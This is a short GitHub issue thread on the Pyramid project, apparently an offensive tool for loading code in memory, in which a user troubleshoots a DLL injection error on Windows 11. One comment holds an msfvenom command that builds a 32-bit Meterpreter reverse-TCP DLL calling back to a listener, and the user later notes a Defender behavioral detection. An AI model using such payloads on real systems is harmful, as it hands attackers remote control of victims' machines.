### ISSUE TITLE
Getting OS error

### ISSUE THREAD

**Issue by elagrija** [naksyn/Pyramid#14]
![pymemmodule error](https://github.com/naksyn/Pyramid/assets/13571168/b58f31ca-885b-435f-9709-d1592584ff6c)
 
Could you suggest us to resolve this. I m running in windows 11

**Comment by elagrija** [comment]
msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=10.0.2.15  LPORT=9500 > reverse_32bit.dll

**Comment by elagrija** [comment]
Shall i request you to kindly look at this and help us to proceed further.

**Comment by naksyn** [comment]
This is not a Pyramid issue. You have to use the proper payload, furthermore, you are injecting a 32 bit dll into a 64 bit process

**Comment by elagrija** [comment]
yea got it.. thanks

**Comment by elagrija** [comment]
Finally Got some Output. But it is detected by Defender in behavioral alert.
![MicrosoftTeams-image (4)](https://github.com/naksyn/Pyramid/assets/13571168/5df0923d-b2e3-4240-abfd-b470d1ed5886)
